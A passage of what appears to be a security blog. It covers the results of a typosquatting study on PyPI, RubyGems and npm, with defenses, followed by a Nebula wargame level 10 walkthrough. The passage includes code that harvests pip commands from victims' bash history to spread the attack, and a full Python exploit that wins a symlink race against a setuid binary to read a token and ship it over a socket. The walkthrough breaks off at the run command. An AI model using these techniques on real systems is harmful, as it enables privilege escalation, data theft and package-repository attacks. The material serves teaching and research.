<p>Packages for three different package managers, <code>PyPi (Python)</code>, <code>rubygems.org (Ruby)</code> and <code>npmjs.com (Node.js – JavaScript)</code>, were uploaded and distributed. Most installations came from <code>PyPi</code>, with 15221 unique installations measured by distinct IP
addresses. <code>rubygems.org</code> follows with 1631 distinct installations. <code>Npmjs.com</code>, with 525
unique IP addresses counted, had the smallest number of installations.</p>
<p>At least <strong>43.6% of the 17289</strong> unique IP addresses executed the notification program with <strong>administrative rights</strong>. Of the 19603 distinct interactions, 8614 machines used <code>Linux</code> as their operating system, 6174 used <code>Windows</code> and 4758
computers were running <code>OS X</code>. Only 57 hosts (or 0.29%) could not be mapped to one of these
three major operating systems. These were mostly FreeBSD and Java operating systems (or,
in rare instances, junk data that was submitted manually and thus could not be parsed).</p>
<p>Some statistical numbers for the uploaded packages and their installations:</p>
<ul>
<li><strong>214</strong> distinct typo packages were uploaded to three different package repositories</li>
<li>Each package received 92 installations on average</li>
<li>The standard deviation of installations per package is 433 and thus relatively high</li>
<li>The most installed package (urllib2) received <strong>3929 unique installations</strong> in almost 2 weeks
(284 installations per day on average)</li>
<li>The most installed package per day was <code>bs4</code> with <strong>366 unique daily installations</strong> on average</li>
<li>The least installed package had only one installation (probably by a mirror or crawler)</li>
</ul>
<p>The image below visualizes the installations over time. Each point shows the installations on a certain day. The upper plot shows the total number of unique installations on each day. The light dashed line shows the installations with administrative
rights. The bottom plot splits the installations into two sets: those of the top five installed packages (circles as markers) and those of all remaining packages (squares as markers). Light sub-graphs show the share of installations with administrative rights.</p>
<p><img src="/images/dl_over_time_accum.png" alt="Downloads over time" style="width: 700px;"/></p>
<p>A reverse lookup was conducted on the gathered IP addresses. The image below shows the number of hosts for some interesting domains.</p>
<p><img src="/images/table_ts_ns.jpg" alt="Number of hosts per domain" style="width: 600px;"/></p>
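<p>A minimal sketch of how such a per-domain count could be produced, assuming that "reverse lookup" means a reverse DNS (PTR) lookup. The helper names <code>registered_domain</code> and <code>hosts_per_domain</code> are made up for this illustration and are not taken from the thesis. The domain is naively approximated by the last two labels of the host name:</p>

```python
import socket
from collections import Counter


def registered_domain(hostname):
    """Naive approximation: keep only the last two labels of the host name."""
    return '.'.join(hostname.rstrip('.').split('.')[-2:]).lower()


def hosts_per_domain(ip_addresses, resolve=socket.gethostbyaddr):
    """Count distinct IP addresses per domain of their reverse DNS name.

    `resolve` is injectable so the function can be tried without network
    access; by default the standard library resolver is used.
    """
    counts = Counter()
    for ip in set(ip_addresses):
        try:
            hostname = resolve(ip)[0]
        except OSError:
            # socket.herror and socket.gaierror are subclasses of OSError;
            # hosts without a reverse entry are simply skipped
            continue
        counts[registered_domain(hostname)] += 1
    return counts
```

<p>The last-two-labels rule is wrong for suffixes such as <code>co.uk</code>. A real analysis would need a public suffix list.</p>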
<h3>Making the attack wormable</h3>
<p>The basic idea is to make the typosquatting attack <em>wormable</em> by mining typo candidates from the command line history of encountered hosts. The function <code>get_command_history()</code> in the <em>Notification Program</em> above</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">get_command_history</span><span class="p">():</span>
    <span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
        <span class="c1"># handle windows</span>
        <span class="c1"># http://serverfault.com/questions/95404/</span>
        <span class="c1">#is-there-a-global-persistent-cmd-history</span>
        <span class="c1"># apparently, there is no history in windows :(</span>
        <span class="k">return</span> <span class="s1">''</span>
    <span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span><span class="p">:</span>
        <span class="c1"># handle linux and mac</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="s1">'cat </span><span class="si">{}</span><span class="s1">/.bash_history | grep -E "pip[23]? install"'</span>
        <span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">expanduser</span><span class="p">(</span><span class="s1">'~'</span><span class="p">)))</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</code></pre></div>
<p>collects the history entries that involve a <code>pip</code> installation command. The package names are then parsed from these commands, and I looked for real typos by comparing them to the list of all existing packages in the <code>PyPi</code> index. If a package name wasn't found there, a new typo name was successfully mined.</p>
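<p>The parsing and comparison step could look roughly like the following sketch. It is not the code used in the thesis. The function names and the <code>known_packages</code> set (a locally available list of registered package names) are assumptions made for illustration:</p>

```python
import re
import shlex
from collections import Counter

PIP_COMMANDS = {'pip', 'pip2', 'pip3'}
SHELL_SEPARATORS = {'&&', '||', ';', '|'}


def extract_package_names(history_text):
    """Return the package names found in 'pip install' history lines."""
    names = []
    for line in history_text.splitlines():
        try:
            tokens = shlex.split(line)
        except ValueError:
            # unbalanced quotes or similar junk: skip the line
            continue
        for i in range(len(tokens) - 1):
            if tokens[i] in PIP_COMMANDS and tokens[i + 1] == 'install':
                for arg in tokens[i + 2:]:
                    if arg in SHELL_SEPARATORS:
                        break
                    if arg.startswith('-'):
                        # simplification: values of options are not skipped
                        continue
                    # strip version specifiers and extras, e.g. numpy==1.9
                    name = re.split(r'[=<>!~\[]', arg)[0].lower()
                    if name:
                        names.append(name)
                break
    return names


def mine_typo_candidates(history_text, known_packages):
    """Count installed names that are not registered in the package index."""
    return Counter(name for name in extract_package_names(history_text)
                   if name not in known_packages)
```

<p>Running this per host and counting on how many distinct hosts a name shows up would give numbers comparable to the ones reported below.</p>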
<p>The analysis of the <strong>1454 distinct hosts</strong> that sent their command history reveals a concerning result: mining the command history for typos uncovered several new
high-quality typo candidates that <strong>promise large numbers of installations</strong>. Especially the module names <code>git</code> (misspelled on 90 distinct hosts), <code>scikit</code> (89 unique misspellings)
and <code>bs4</code> (31 hits) seem to be mistyped frequently among independent users. By registering them, lots of typo installations and thus code execution seem to be guaranteed. And the more new installations there are, the more new typo candidates can be mined. <em>Worm-like behavior</em>.</p>
<p><img src="/images/table_command_history.jpg" alt="Command history mining" style="width: 600px;"/></p>
<h3>Defenses against typo squatting</h3>
<p>In short, read the thesis. If you are too lazy, do the following:</p>
<p><strong>Prevent Direct Code Execution on Installations</strong>
This one is easy. Make sure that the software that unpacks and installs a third-party package (<code>pip</code> or <code>npm</code>) does not allow the execution of code that originates from the package itself. The library code should be executed only when the user explicitly loads the package.</p>
<p><strong>Generate a List of Potential Typo Candidates</strong>
Generate Levenshtein distance candidates for the N most downloaded packages of the repository and alert administrators when such a candidate is registered.</p>
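<p>As a rough sketch of this defense, a repository could compare every newly registered name against its most popular packages. The function <code>flag_typo_candidates</code> and the default threshold of 2 are assumptions chosen for illustration, not a recommendation from the thesis:</p>

```python
def levenshtein(a, b):
    """Classic dynamic programming edit distance between two strings."""
    if len(a) < len(b):
        a, b = b, a
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            insert_cost = current[j - 1] + 1
            delete_cost = previous[j] + 1
            replace_cost = previous[j - 1] + (char_a != char_b)
            current.append(min(insert_cost, delete_cost, replace_cost))
        previous = current
    return previous[-1]


def flag_typo_candidates(new_name, popular_names, max_distance=2):
    """Return the popular packages that a newly registered name is close to."""
    return sorted(name for name in popular_names
                  if 0 < levenshtein(new_name.lower(), name.lower()) <= max_distance)
```

<p>Note that a swapped pair of letters counts as two edits in the plain Levenshtein distance, so a threshold of 1 would miss typos like <code>reqeusts</code>.</p>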
<p><strong>Analyze 404 logfiles and prevent registration of frequently <em>shadow-installed</em> packages</strong>
Whenever a user makes a typo when installing a package and the package is not registered yet, a 404 logfile entry is created on the repository server (because the install HTTP request targets a non-existent resource). Parse these <em>failed installations</em> and block the registration of all names that are <em>shadow-installed</em> more often than a reasonable threshold per month.</p>
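<p>A minimal sketch of such a log analysis follows. It assumes access logs in the common log format and install requests of the form <code>GET /simple/&lt;name&gt;/</code>. Both are assumptions about the repository server, and <code>shadow_installed</code> is a hypothetical helper name:</p>

```python
import re
from collections import Counter

# Assumed request shape: "GET /simple/<name>/ HTTP/1.1" followed by status 404
FAILED_INSTALL = re.compile(
    r'"GET /simple/(?P<name>[^/\s"]+)/? HTTP/[0-9.]+" 404\b')


def shadow_installed(log_lines, threshold):
    """Return names requested but not found more than `threshold` times."""
    counts = Counter()
    for line in log_lines:
        match = FAILED_INSTALL.search(line)
        if match:
            counts[match.group('name').lower()] += 1
    return {name: hits for name, hits in counts.items() if hits > threshold}
```

<p>Feeding one month of log lines into <code>shadow_installed</code> yields the names that should be blocked from registration. Counting distinct client addresses instead of raw requests would make the result less sensitive to retries.</p>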
<h3>Conclusion</h3>
<p>If I had had malicious intentions and had distributed malware instead of the notification program, which only sends information to a university web server, then these <strong>17289 unique hosts</strong> would have been under my control. The at least <strong>43.6 %</strong> of hosts with administrative rights would have given me <strong>8552 computers with complete access</strong> to the whole operating system API.</p>
<p>The results of this thesis show that creating a botnet by exploiting human typos is
perfectly possible. However, it is hard to say how much the cover of academic research at the university prevented security researchers from interrupting the empirical study.</p>
<p>In the thesis itself, several powerful methods to defend against typo squatting attacks are discussed in detail. Therefore, they are only briefly summarized in this blog post.</p>
<p>In the thesis, the well known programming languages <code>Python</code>, <code>NodeJS</code> and <code>Ruby</code> were attacked. All their package managers were found to be vulnerable to typosquatting attacks. It is of great importance to find out whether other programming languages (such as <code>.NET</code> or <code>Go</code>) suffer from the same problems.</p>Nebula Wargame walkthrough Level 10-192015-09-29T10:30:00+02:002015-10-23T17:26:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-29:/2015/09/29/nebula-wargame-walkthrough-level-10-19/<p>Walkthrough of nebula wargame from level 10 to level 19</p><h2>Preface</h2>
<p>In the last <a href="https://incolumitas.com/2015/09/28/nebula-wargame-walkthrough-level-0-9/">blog post</a> I covered the Nebula Wargame levels 0 to 9. Now I will
try to solve levels 10 to 19. In this blog post I am sharing my thoughts while trying to solve these Linux shell exploit exercises.</p>
<h2>Level 10 - Race conditions in network applications</h2>
<p>Compared to the previous levels, this one was quite hard for me!</p>
<p>There are two files in the <code>/home/flag10</code> directory:</p>
<ul>
<li>The <code>/home/flag10/flag10</code> setuid binary </li>
<li>A token file which we want to read</li>
</ul>
<p>The setuid binary was compiled from the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><fcntl.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><errno.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/socket.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><netinet/in.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">file</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">host</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s file host</span><span class="se">\n\t</span><span class="s">sends file to host if you have access to it</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">host</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">access</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">R_OK</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">ffd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">rc</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="w"> </span><span class="n">sin</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Connecting to %s:18211 .. "</span><span class="p">,</span><span class="w"> </span><span class="n">host</span><span class="p">);</span><span class="w"> </span><span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span><span class="w"> </span><span class="n">SOCK_STREAM</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">memset</span><span class="p">(</span><span class="o">&</span><span class="n">sin</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">sin</span><span class="p">.</span><span class="n">sin_family</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">AF_INET</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">sin</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_addr</span><span class="p">(</span><span class="n">host</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">sin</span><span class="p">.</span><span class="n">sin_port</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">htons</span><span class="p">(</span><span class="mi">18211</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sin</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="p">))</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Unable to connect to host %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">host</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#define HITHERE ".oO Oo.\n"</span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">HITHERE</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">HITHERE</span><span class="p">))</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Unable to write banner to host %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">host</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#undef HITHERE</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Connected!</span><span class="se">\n</span><span class="s">Sending file .. "</span><span class="p">);</span><span class="w"> </span><span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">ffd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="n">O_RDONLY</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">ffd</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Damn. Unable to open file</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">rc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">read</span><span class="p">(</span><span class="n">ffd</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">rc</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Unable to read from file: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="n">rc</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"wrote file!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"You don't have access to %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">file</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Only after reading the notes in <code>man access</code> did it become clear to me how to attack this application. The manual warns:</p>
<blockquote>
<p>Warning: Using <code>access()</code> to check if a user is authorized to, for example, open a file before actually doing so using <code>open(2)</code> creates a security hole, because the
user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be
avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call
<code>open(2)</code>.)</p>
</blockquote>
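<p>So we are going to exploit the fact that we can change the target of a symbolic (or hard) link between the <code>access()</code> and <code>open()</code> system calls. <code>access()</code> checks permissions with the real user ID (level10), while <code>open()</code> runs with the effective user ID (flag10), and each call resolves the path from scratch. The fact that the <code>connect()</code> system call sits between the two makes the attack even simpler, because <code>connect()</code> usually needs some time to finish.</p>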
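<p>To make the window concrete, here is a minimal, harmless sketch of the same check-then-open sequence, replayed in a single process inside a temporary directory. The file names and the helpers <code>swap_symlink</code> and <code>simulate_race</code> are made up for illustration, and both files are readable by the current user, so it only shows that the path is resolved twice, not a privilege bypass. It assumes Python 3.3 or newer for <code>os.replace</code>.</p>
<div class="highlight"><pre><span></span><code>import os
import tempfile


def swap_symlink(link_path, new_target):
    """Atomically repoint link_path at new_target by renaming over the old link."""
    tmp_link = link_path + ".tmp"
    os.symlink(new_target, tmp_link)
    os.replace(tmp_link, link_path)


def simulate_race(workdir):
    """Replay the check-then-open sequence with the swap done in between."""
    harmless = os.path.join(workdir, "harmless")
    secret = os.path.join(workdir, "secret")
    link = os.path.join(workdir, "link")
    with open(harmless, "w") as f:
        f.write("bla\n")
    with open(secret, "w") as f:
        f.write("stand-in for the token\n")

    os.symlink(harmless, link)
    # Step 1: the check, as flag10 does with access(argv[1], R_OK).
    check_passed = os.access(link, os.R_OK)
    # Step 2: the attacker's move while the victim is busy in connect().
    swap_symlink(link, secret)
    # Step 3: the victim opens the same path, which now resolves elsewhere.
    with open(link) as f:
        return check_passed, f.read()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        print(simulate_race(d))
</code></pre></div>
<p>The check passes against the harmless file, yet the data that is read comes from the second file, because <code>open()</code> follows the link as it exists at that moment.</p>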
<p>My exploit is written in Python. I guess you could create a much simpler version in a few lines of shell code (for example with netcat), but sometimes it is also worth writing your own socket programs for practice.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="n">ip</span> <span class="o">=</span> <span class="s1">'192.168.56.101'</span>
<span class="k">def</span> <span class="nf">run_server</span><span class="p">():</span>
    <span class="n">pid</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">getpid</span><span class="p">()</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">address</span> <span class="o">=</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">18211</span><span class="p">)</span>
        <span class="nb">print</span><span class="p">(</span><span class="s1">'[i] About to run server on </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">address</span><span class="p">))</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
        <span class="n">s</span><span class="o">.</span><span class="n">setsockopt</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">SOL_SOCKET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SO_REUSEADDR</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">s</span><span class="o">.</span><span class="n">bind</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
        <span class="n">s</span><span class="o">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
        <span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
            <span class="n">conn</span><span class="p">,</span> <span class="n">address</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">accept</span><span class="p">()</span>
            <span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">handle_connection</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">address</span><span class="p">,</span> <span class="n">pid</span><span class="p">))</span>
            <span class="n">t</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
    <span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">s</span><span class="p">:</span>
            <span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="s1">'Pressed Ctrl-C. Exiting...'</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">handle_connection</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">address</span><span class="p">,</span> <span class="n">serverpid</span><span class="p">):</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'Incoming connection from </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">address</span><span class="p">))</span>
    <span class="c1"># wait a second before receiving data</span>
    <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">banner</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">banner</span><span class="p">)</span>
    <span class="n">token_contents</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">token_contents</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">token_contents</span><span class="o">.</span><span class="n">strip</span><span class="p">():</span>
        <span class="n">os</span><span class="o">.</span><span class="n">kill</span><span class="p">(</span><span class="n">serverpid</span><span class="p">,</span> <span class="n">signal</span><span class="o">.</span><span class="n">SIGKILL</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">race_condition</span><span class="p">():</span>
    <span class="sd">"""</span>
<span class="sd">    First create a symbolic link to a file which we own</span>
<span class="sd">    to bypass the access() check, then change the link to</span>
<span class="sd">    the /home/flag10/token after access() was executed.</span>
<span class="sd">    """</span>
    <span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s1">'/home/level10/'</span><span class="p">)</span>
    <span class="c1"># create a file that user level10 owns</span>
    <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'echo "bla " >> /tmp/testfile'</span><span class="p">)</span>
    <span class="c1"># create a link to the previously created file</span>
    <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'ln -s -f /tmp/testfile /home/level10/link'</span><span class="p">)</span>
    <span class="c1"># call the setuid binary in a non blocking fashion</span>
    <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">([</span><span class="s1">'/home/flag10/flag10 /home/level10/link '</span> <span class="o">+</span> <span class="n">ip</span><span class="p">],</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
                     <span class="n">stdin</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
    <span class="c1"># let's hope that access() was already executed but open() wasn't,</span>
    <span class="c1"># because the connection is still waiting to get accepted.</span>
    <span class="c1"># then change the link location to the token file :)</span>
    <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'ln -s -f /home/flag10/token /home/level10/link'</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">server</span> <span class="o">=</span> <span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">run_server</span><span class="p">)</span>
    <span class="n">server</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
    <span class="n">race_condition</span><span class="p">()</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>When running the above program, it sometimes works and sometimes doesn't, probably because the <code>connect()</code> call takes a varying amount of time, so the link is not always swapped between <code>access()</code> and <code>open()</code>. On a successful execution we get:</p>
<div class="highlight"><pre><span></span><code>level10@nebula:~$ python exploit.py
